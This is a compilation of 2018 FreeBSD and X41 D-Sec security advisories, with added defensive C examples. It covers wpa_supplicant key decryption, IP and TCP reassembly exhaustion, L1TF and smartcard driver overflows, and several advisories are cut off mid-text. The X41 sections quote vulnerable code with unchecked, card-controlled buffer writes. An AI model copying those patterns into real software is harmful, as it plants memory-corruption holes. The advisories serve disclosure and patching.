Corrected:      2018-08-15 05:03:54 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
                2018-08-15 05:05:02 UTC (stable/10, 10.4-STABLE)
                2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:       CVE-2018-14526

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The wpa_supplicant(8) utility is a client (supplicant) with support for WPA
and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop and laptop
computers as well as embedded systems. Supplicant is the IEEE 802.1X/WPA
component that is used in the client stations. It implements key
negotiation with a WPA Authenticator and it controls the roaming and IEEE
802.11 authentication/association of the wlan(4) driver.

The wpa_supplicant(8) utility is designed to be a "daemon" program that runs
in the background and acts as the backend component controlling the
wireless connection. The wpa_supplicant(8) utility supports separate
frontend programs and a text-based frontend (wpa_cli(8)) and a GUI
(wpa_gui) are included with wpa_supplicant(8).

II.  Problem Description

When using WPA2, EAPOL-Key frames with the Encrypted flag and without the
MIC flag set, the data field was decrypted first without verifying the MIC.
When the data field was encrypted using RC4, for example, when negotiating
TKIP as a pairwise cipher, the unauthenticated but decrypted data was
subsequently processed.

This opened wpa_supplicant(8) to abuse by decryption and recovery of
sensitive information contained in EAPOL-Key messages.

See https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt
for a detailed description of the bug.

III. Impact

All users of the WPA2 TKIP pairwise cipher are vulnerable to disclosure of
information, for example, the group key.

IV.  Workaround

Remove TKIP as an allowed pairwise cipher in RSN/WPA2 networks in
wpa_supplicant.conf(5) by changing 'pairwise=CCMP TKIP' to 'pairwise=CCMP'.
This can also be mitigated by removing TKIP as a cipher on the AP.

Systems and users who do not use WPA2 TKIP are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch.asc
# gpg --verify hostapd.patch.asc

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch.asc
# gpg --verify hostapd-10.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r337832
releng/10.4/                                                      r337829
stable/11/                                                        r337831
releng/11.1/                                                      r337828
releng/11.2/                                                      r337828
- -------------------------------------------------------------------------
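The problem description above is an ordering bug: key data flagged Encrypted was decrypted before (or without) the MIC being verified. This added example (not wpa_supplicant code; the field offsets and Key Information bit positions are the standard IEEE 802.1X/802.11 ones, the function names and the two constructed frames are this example's own) shows the check a receiver makes on the Key Information field before it touches the key data, plus the descriptor-version test that identifies the RC4 key-wrap case used with TKIP.

```c
/* Added example, not from wpa_supplicant: decide what to do with an
 * EAPOL-Key frame before any decryption. Names are assumptions. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define KEY_INFO_VERSION_MASK 0x0007  /* bits 0..2: key descriptor version */
#define KEY_INFO_KEY_MIC      0x0100  /* bit 8:  Key MIC present           */
#define KEY_INFO_ENCR_DATA    0x1000  /* bit 12: Key Data is encrypted     */

typedef enum {
    EK_PROCESS,                 /* authenticated; safe to decrypt and use */
    EK_DROP_MALFORMED,          /* too short or not an EAPOL-Key frame    */
    EK_DROP_UNAUTH_ENCRYPTED,   /* Encrypted set but no MIC: the bug case */
    EK_DROP_BAD_MIC             /* MIC present but does not verify        */
} ek_verdict;

typedef struct {
    uint8_t  descriptor_type;   /* 2 = RSN (WPA2) key descriptor */
    uint16_t key_info;
} eapol_key_hdr;

/* EAPOL: version(1) type(1) body_len(2); Key Descriptor: type(1) key_info(2, BE) ... */
bool parse_eapol_key(const uint8_t *frame, size_t len, eapol_key_hdr *out)
{
    if (len < 7) return false;                         /* header + desc type + key info */
    if (frame[1] != 3) return false;                   /* EAPOL packet type 3 = EAPOL-Key */
    uint16_t body_len = (uint16_t)((frame[2] << 8) | frame[3]);
    if (body_len < 3 || (size_t)body_len + 4 > len) return false;   /* body must fit */
    out->descriptor_type = frame[4];
    out->key_info = (uint16_t)((frame[5] << 8) | frame[6]);
    return true;
}

/* Descriptor version 1 means HMAC-MD5 MIC and RC4 key wrap, the combination
 * negotiated with TKIP that the advisory singles out. */
bool uses_rc4_keywrap(uint16_t key_info)
{
    return (key_info & KEY_INFO_VERSION_MASK) == 1;
}

/* mic_valid is the result of recomputing the MIC with the KCK over the
 * frame; it is consulted only when the frame claims to carry a MIC. */
ek_verdict eapol_key_verdict(uint16_t key_info, bool mic_valid)
{
    bool has_mic   = (key_info & KEY_INFO_KEY_MIC) != 0;
    bool encrypted = (key_info & KEY_INFO_ENCR_DATA) != 0;

    /* The vulnerable order decrypted first. Encrypted key data with no MIC
     * can never be authenticated, so it is dropped before decryption. */
    if (encrypted && !has_mic)
        return EK_DROP_UNAUTH_ENCRYPTED;
    if (has_mic && !mic_valid)
        return EK_DROP_BAD_MIC;
    return EK_PROCESS;
}

ek_verdict check_frame(const uint8_t *frame, size_t len, bool mic_valid)
{
    eapol_key_hdr h;
    if (!parse_eapol_key(frame, len, &h) || h.descriptor_type != 2)
        return EK_DROP_MALFORMED;
    return eapol_key_verdict(h.key_info, mic_valid);
}

/* Constructed frames, truncated right after Key Information (body_len 3):
 * EAPOL v2, type 3, RSN descriptor; key_info 0x12C9 = version 1, Pairwise,
 * Install, Ack, Secure, Encrypted, NO MIC; 0x13C9 = the same plus MIC. */
const uint8_t SAMPLE_ENCRYPTED_NO_MIC[7]   = { 0x02, 0x03, 0x00, 0x03, 0x02, 0x12, 0xC9 };
const uint8_t SAMPLE_ENCRYPTED_WITH_MIC[7] = { 0x02, 0x03, 0x00, 0x03, 0x02, 0x13, 0xC9 };
```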
FreeBSD Security Advisory FreeBSD-SA-18:10.ip
=============================================================================
FreeBSD-SA-18:10.ip                                         Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in IP fragment reassembly

Category:       core
Module:         inet
Announced:      2018-08-14
Credits:        Juha-Matti Tilli from Aalto University, Department of
                Communications and Networking and Nokia Bell Labs
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-14 18:17:05 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:       CVE-2018-6923

Special note:   Due to source code differences in FreeBSD 10-stable a patch
                is not yet available for FreeBSD 10.4. This will follow at a
                later date.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The Internet Protocol (IP) version 4 (IPv4) allows fragmentation of packets
which are too big to traverse all the links between two end stations. Any
router along the path between two end hosts may fragment packets which are
larger than a link's maximum transmission unit (MTU). FreeBSD's
implementation of some IPv4 protocols (such as the Transmission Control
Protocol [TCP]) performs path MTU discovery to avoid the need for
fragmentation.

IP version 6 (IPv6) retains the concept of packet fragmentation. It changed
the fragmentation operation to require that the originating end-system
perform path MTU discovery and fragment packets which are too large for any
MTU along the path between two end systems.

While all hosts attached to the Internet are required to support
fragmentation and reassembly, many hosts will encounter very few legitimate
fragmented packets due to the operation of path MTU discovery.

II.  Problem Description

A researcher has notified us of a DoS attack applicable to another
operating system. While FreeBSD may not be vulnerable to that exact attack,
we have identified several places where inadequate DoS protection could
allow an attacker to consume system resources.

It is not necessary that the attacker be able to establish two-way
communication to carry out these attacks. These attacks impact both IPv4
and IPv6 fragment reassembly.

III. Impact

In the worst case, an attacker could send a stream of crafted fragments
with a low packet rate which would consume a substantial amount of CPU.

Other attack vectors allow an attacker to send a stream of crafted
fragments which could consume a large amount of CPU or all available mbuf
clusters on the system.

These attacks could temporarily render a system unreachable through
network interfaces or temporarily render a system unresponsive. The effects
of the attack should clear within 60 seconds after the attack stops.

IV.  Workaround

Disable fragment reassembly, using these commands:

% sysctl net.inet.ip.maxfragpackets=0
% sysctl net.inet6.ip6.maxfrags=0

On systems compiled with VIMAGE, these sysctls will need to be executed
for each VNET.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release or
security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch.asc
# gpg --verify ip.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-
FreeBSD Security Advisory FreeBSD-SA-18:09.l1tf

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:09.l1tf                                       Security Advisory
                                                          The FreeBSD Project

Topic:          L1 Terminal Fault (L1TF) Kernel Information Disclosure

Category:       core
Module:         Kernel
Announced:      2018-08-14
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-14 17:51:12 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:       CVE-2018-3620, CVE-2018-3646

Special Note:   Speculative execution vulnerability mitigation remains a work
                in progress.  This advisory addresses the issue in FreeBSD
                11.1 and later.  We expect to update this advisory to include
                10.4 at a later time.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

When a program accesses data in memory via a logical address it is
translated to a physical address in RAM by the CPU.  Accessing an
unmapped logical address results in what is known as a terminal fault.

II.  Problem Description

On certain Intel 64-bit x86 systems there is a period of time during
terminal fault handling where the CPU may use speculative execution to
try to load data.  The CPU may speculatively access the level 1 data
cache (L1D).  Data which would otherwise be protected may then be
determined by using side channel methods.

This issue affects bhyve on FreeBSD/amd64 systems.

III. Impact

An attacker executing user code, or kernel code inside of a virtual
machine, may be able to read secret data from the kernel or from
another virtual machine.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch.asc
# gpg --verify l1tf-11.2.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch.asc
# gpg --verify l1tf-11.1.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

CVE-2018-3620 (L1 Terminal Fault-OS)

FreeBSD reserves the memory page at physical address 0, so it will not
contain secret data.  FreeBSD zeros the paging data structures for
unmapped addresses, so that speculatively executed L1 Terminal Faults
will access only the reserved, unused page.

CVE-2018-3646 (L1 Terminal Fault-VMM)

Patched systems flush the L1 data cache prior to guest entry, so that
there is no secret data in cache for a terminal fault (from the guest)
to access.

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/11/                                                        r337794
releng/11.1/                                                      r337828
releng/11.2/                                                      r337828
-----------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>

VII. References

More information on L1 Terminal Fault is available at:

htt
FreeBSD Security Advisory FreeBSD-SA-18:08.tcp

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:08.tcp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in TCP reassembly

Category:       core
Module:         inet
Announced:      2018-08-06
Credits:        Juha-Matti Tilli from Aalto University, Department of
                Communications and Networking and Nokia Bell Labs
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
                2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE)
                2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:       CVE-2018-6922

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2018-08-06  Initial release.
v1.1  2018-08-14  Fixed documentation date in manual pages.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service.  To transmit a stream of data, TCP breaks the data
stream into segments for transmission through the Internet, and
reassembles the segments at the receiving side to recreate the data
stream.

II.  Problem Description

One of the data structures that holds TCP segments uses an inefficient
algorithm to reassemble the data.  This causes the CPU time spent on
segment processing to grow linearly with the number of segments in the
reassembly queue.

III. Impact

An attacker who has the ability to send TCP traffic to a victim system
can degrade the victim system's network performance and/or consume
excessive CPU by exploiting the inefficiency of TCP reassembly
handling, with relatively small bandwidth cost.

IV.  Workaround

As a workaround, system administrators should configure their systems
to only accept TCP connections from trusted end-stations, if it is
possible to do so.

For systems which must accept TCP connections from untrusted
end-stations, the workaround is to limit the size of each reassembly
queue.  The capability to do that is added by the patches noted in the
"Solution" section below.

V.   Solution

As a temporary solution to this problem, these patches limit the size
of each TCP connection's reassembly queue.  The value is controlled by
a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum
number of TCP segments that can be outstanding on a session's
reassembly queue.  This value defaults to 100.

Note that setting this value too low could impact the throughput of
TCP connections which experience significant loss or reordering.
However, the higher this number is set, the more resources can be
consumed on TCP reassembly processing.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc
# gpg --verify tcp-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc
# gpg --verify tcp-11.patch.asc

[*** v1.1 NOTE ***] The following patchsets are provided for
completeness; they have little impact on runtime behavior.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch.asc
# gpg --verify tcp-man-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch.asc
# gpg --verify tcp-man-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.h
X41 D-Sec GmbH Security Advisory X41-2018-004: Multiple Vulnerabilities in Yubico libykneomgr

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-004

Multiple Vulnerabilities in Yubico libykneomgr
==============================================

Overview
--------
Confirmed Affected Versions: 0.1.9
Confirmed Patched Versions: -
Vendor: Yubico / Deprecated
Vendor URL: https://www.yubico.com/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-004-libykneomgr/

Summary and Impact
------------------
An out-of-bounds write and an out-of-bounds read were discovered in the
handling of malicious responses from a smartcard. These might lead to
memory corruption. We assume that these are not easily exploitable.

X41 did not perform a full test or audit on the software.

Please note that the library has been deprecated for more than a year
and no update will be published by the vendor.

Product Description
-------------------
This is a C library to interact with the CCID-part of the YubiKey NEO.
There is a command line tool "ykneomgr" for interactive use. It supports
querying the YubiKey NEO for firmware version, operation mode (OTP/CCID)
and serial number. You may also mode switch the device and manage
applets (list, delete and install).

Out of Bounds Read/Writes
=========================
Severity Rating: Medium
Vector: APDU Response
CVE: -
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
File lib/backend_pcsc.c contains the following code in function
`backend_applet_list()`:

{% highlight c %}
    {
      size_t i;
      size_t this_len = recv[length++];
      for (i = 0; i < this_len; i++)
        {
          if (applet_str)
            {
              if (real_len + 2 > *len)
                {
                  return YKNEOMGR_BACKEND_ERROR;
                }
              sprintf (p, "%02x", recv[length]);
              p += 2;
            }
          real_len += 2;
          length++;
        }
      if (applet_str)
        {
          if (real_len + 1 > *len)
            {
              return YKNEOMGR_BACKEND_ERROR;
            }
          *p = '\0';
          p++;
        }
      real_len++;
      length += 2;
    }
{% endhighlight %}

There is an off-by-one write of a '\x00' when sprintf() is called, since
it terminates the string with a trailing null byte: the check
`real_len + 2 > *len` only accounts for the two hex characters, not for
the terminator sprintf() writes after them.

Additionally, reads are performed based on this_len, which is retrieved
from the card data without further safety checks against the number of
bytes actually received.

Workarounds
-----------
It is advised to migrate to YubiKey Manager since the vendor does not
support the library anymore and will not issue a patch.

Timeline
--------
2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Vendor reply
2018-06-05 Requesting technical feedback from the vendor
2018-06-06 Vendor confirms bug, but states that library is deprecated, will not be fixed
2018-08-11 Advisory released

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3PMACgkQo5Klpg50
CxCvvA//RdQkadlV9yD1IFM7+lqkfMYCyeRyjEg19NWY7QL3Y6C0BeMNiMv/q74i
TUw3G30X6ehgsaef5VWzpC7IibUC2DbltIZV3tYpNHePvc4GeMAl9dytqAy4MGnM
EIxC7RrT4w85EDnaK9NvEXdo2QOlSuzt1MtePYhmoa23wZFH328w1WVhxgAYffna
Cu7LCJIgWkh1y5jqc66553g34SRH3jiuVYSwTgIzC2MhVnXrjktbIwgddJLkV5Zr
eRktqby13iWZns/oGE4GYjsmryoXaoDfGS5wuro7CNua+JqiEPwsH0bURvJDUxGi
MvEEMl5TwoCeTzDqsofLBou1RNLVyI6W19MnYhNC6RCSUuFRXFF3nHqO7vQ5Gpft
JS6URDUKWd/reh0Xwy3dlaEaXEIUPEHBcLwd0wmKqVgMTjUrOvgIAED8woS+Rzn9
qI+NbooNGt1OzlXR4RojKjRMJtWcwya8bhlNLk/ZFl/pokAEh6bZ1jcMg/U0NG9Q
R4AI2u2NX3lE39ku/dcTQQCJpTTcr0DdGUw6kux0dkJXEhEc6YixgFzrHH1CPS/y
2sYLICX3iWjAtd81CO0PL4QXte2ekh8YWaf/1qV2BusOxwlHQjODO8o3kLueU2DC
Uy4ftml35nu+qVS+vYA85N4+4/Fri6UkbjkgbI2fODgE3pImc+A=
=dyfA
-----END PGP SIGNATURE-----
X41 D-Sec GmbH Security Advisory X41-2018-005: Multiple Vulnerabilities in Apple smartcardservices

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-005

Multiple Vulnerabilities in Apple smartcardservices
===================================================

Overview
--------
Confirmed Affected Versions: e3eb96a6eff9d02497a51b3c155a10fa5989021f
Confirmed Patched Versions: 8eef01a5e218ae78cc358de32213b50a601662de
Vendor: Apple
Vendor URL: https://smartcardservices.github.io/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-005-smartcardservices/

Summary and Impact
------------------
Attackers with local access can exploit security issues in the smartcard
driver. These result in memory corruptions, which might lead to code
execution. Since smartcards can be used for authentication, the
vulnerabilities may allow an attacker to login to the system without
valid credentials as any user.

X41 did not perform a full test or audit on the software.

Product Description
-------------------
The Smart Card Services project is comprised of several components
which, when combined, provide the necessary abstraction layer and
integration of smart cards into Apple's CDSA implementation.

Stack based buffer overflow
===========================
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4300
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
In file Tokend/CAC/CACRecord.cpp the function
CACCertificateRecord::getDataAttribute() might overwrite the value
certificate and possibly other stack data, if a smartcard provides
malicious data.

{% highlight c++ %}
	unsigned char command[] = { 0x80, 0x36, 0x00, 0x00, 0x64 };
	unsigned char result[MAX_BUFFER_SIZE];
	size_t resultLength = sizeof(result);
	uint8 certificate[CAC_MAXSIZE_CERT];
	uint8 uncompressed[CAC_MAXSIZE_CERT];
	size_t certificateLength = 0;

	try
	{
		PCSC::Transaction _(cacToken);
		cacToken.select(mApplication);
		uint32_t cacreturn;
		do
		{
			cacreturn = cacToken.exchangeAPDU(command, sizeof(command), result,
				resultLength);

			if ((cacreturn & 0xFF00) != 0x6300)
				CACError::check(cacreturn);

			size_t requested = command[4];
			if (resultLength != requested + 2)
				PCSC::Error::throwMe(SCARD_E_PROTO_MISMATCH);
			memcpy(certificate + certificateLength, result, resultLength - 2);
			certificateLength += resultLength - 2;
			// Number of bytes to fetch next time around is in the last byte
			// returned.
			command[4] = cacreturn & 0xFF;
		} while ((cacreturn & 0xFF00) == 0x6300);
	}
	catch (...)
	{
		return NULL;
	}
{% endhighlight %}

As long as the smartcard returns a return code of 0x63FF, more data is
copied into the certificate buffer; certificateLength is never compared
with the size of the fixed-size certificate array, so the chunks
eventually write past it and cause a stack based overflow. A malicious
smartcard is able to control all of the overflowed bytes.

Workarounds
-----------
None

Stack based buffer overflow with limited input
==============================================
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4301
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
In file Tokend/PKCS11/GemaltoKeyHandle.cpp the function
GemaltoPrivateKeyRecord::computeDecrypt() might overwrite the value
strData if the supplied dataLength is too big.

{% highlight c++ %}
void GemaltoPrivateKeyRecord::computeDecrypt(GemaltoToken &gemaltoToken,
	CK_ULONG mech, const AccessCredentials *cred, unsigned char *data,
	size_t dataLength, unsigned char *output, size_t &outputLength)
{
	GemaltoToken::log("\nGemaltoPrivateKeyRecord::computeDecrypt <BEGIN>\n");
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - mechanism <%lu>\n", mech);
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - cred <%p>\n", cred);

	char strData[6000];
	memset(strData, '\0', sizeof(strData));
	char* str = strData;
	for (size_t i=0; i ... /* hex-encoding loop: its body is lost in the advisory text as published */
	... - data <%s>\n", dataLength, strData);
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - output <%p>\n", output);
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - outputLength <%lu>\n", outputLength);
{% endhighlight %}

The loop hex-encodes dataLength input bytes into the 6000-byte strData
buffer without checking that they fit. The attacker might control the
data which is to be decrypted, but exploitation is limited by the
sprintf() format string.

Workarounds
-----------
None

Timeline
--------
2018-02-03 Issues found
2018-05-22 Vendor contacted
2
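The following is an added example, not smartcardservices code: a C model of the chunked certificate read above with the check the vulnerable loop lacks. A simulated card (constructed here) answers status 0x63XX to request more data, exactly as the real protocol does, and the hardened reader checks every chunk against the space left in the fixed-size buffer before copying. The buffer size, status handling and the fake card are assumptions for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CERT_MAX 512      /* constructed; plays the role of CAC_MAXSIZE_CERT */

/* Simulated card: continuations = how many times it answers 0x63FF
 * ("more data, fetch 0xFF bytes next"); fill = byte value it returns. */
typedef struct {
    unsigned continuations;
    uint8_t fill;
} fake_card_t;

/* Stand-in for cacToken.exchangeAPDU(): writes `requested` data bytes plus
 * a two-byte status into result and returns the status word. */
static uint32_t fake_exchange(fake_card_t *card, size_t requested,
                              uint8_t *result, size_t *result_len)
{
    memset(result, card->fill, requested);
    *result_len = requested + 2;
    if (card->continuations > 0) {
        card->continuations--;
        return 0x63FF;
    }
    return 0x9000;
}

/* Hardened version of the chunked read: the card still drives the chunk
 * size, but every chunk is checked against the space left in cert.
 * Returns the certificate length, or -1 on protocol error or overflow. */
int read_certificate(fake_card_t *card, uint8_t *cert, size_t cert_cap)
{
    uint8_t result[0xFF + 2];
    size_t cert_len = 0;
    size_t requested = 0x64;        /* the initial command asks for 100 bytes */
    uint32_t sw;

    do {
        size_t result_len = 0;
        sw = fake_exchange(card, requested, result, &result_len);
        if ((sw & 0xFF00) != 0x6300 && sw != 0x9000)
            return -1;                           /* CACError::check() equivalent */
        if (result_len != requested + 2)
            return -1;                           /* SCARD_E_PROTO_MISMATCH equivalent */
        size_t n = result_len - 2;
        if (n > cert_cap - cert_len)             /* the check the original lacks */
            return -1;
        memcpy(cert + cert_len, result, n);
        cert_len += n;
        requested = sw & 0xFF;                   /* next chunk size chosen by the card */
    } while ((sw & 0xFF00) == 0x6300);

    return (int)cert_len;
}

/* Run one scenario; returns read_certificate()'s result, or -2 if the
 * stored bytes do not match what the card sent. */
int run_scenario(unsigned continuations, uint8_t fill)
{
    fake_card_t card = { continuations, fill };
    uint8_t cert[CERT_MAX];
    int n = read_certificate(&card, cert, sizeof cert);
    if (n > 0 && (cert[0] != fill || cert[n - 1] != fill))
        return -2;
    return n;
}

int main(void)
{
    printf("well-behaved card, one continuation: %d bytes\n", run_scenario(1, 0xAA));
    printf("card that never stops:               %d\n", run_scenario(5, 0xBB));
    return 0;
}
```

With one continuation the card delivers 100 + 255 bytes and the read succeeds; a card that keeps answering 0x63FF is stopped at the third chunk, where the original code would have written past the array.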
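Both the libykneomgr `backend_applet_list()` bug (X41-2018-004 above) and the Gemalto `computeDecrypt()` bug share one pattern: a card-supplied length drives a hex-encoding loop into a fixed buffer, and the NUL that `sprintf("%02x")` appends is not counted. The block below is an added example, not code from either project; it shows the encoder written so that the length byte is validated against the bytes actually received and the terminator is included in the space check. The response bytes are constructed, and the error codes are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { HEX_ERR_TRUNCATED = -1, HEX_ERR_NOSPACE = -2 };   /* constructed codes */

/* Hex-encode one length-prefixed item found at recv[*pos] into out.
 * out_len is the capacity of out INCLUDING the terminating NUL.
 * Returns the number of hex characters written (>= 0) and advances *pos
 * past the item, or a negative error code and leaves *pos untouched. */
int encode_item(const uint8_t *recv, size_t recv_len, size_t *pos,
                char *out, size_t out_len)
{
    static const char digits[] = "0123456789abcdef";

    if (*pos >= recv_len)
        return HEX_ERR_TRUNCATED;            /* no length byte present */
    size_t this_len = recv[*pos];
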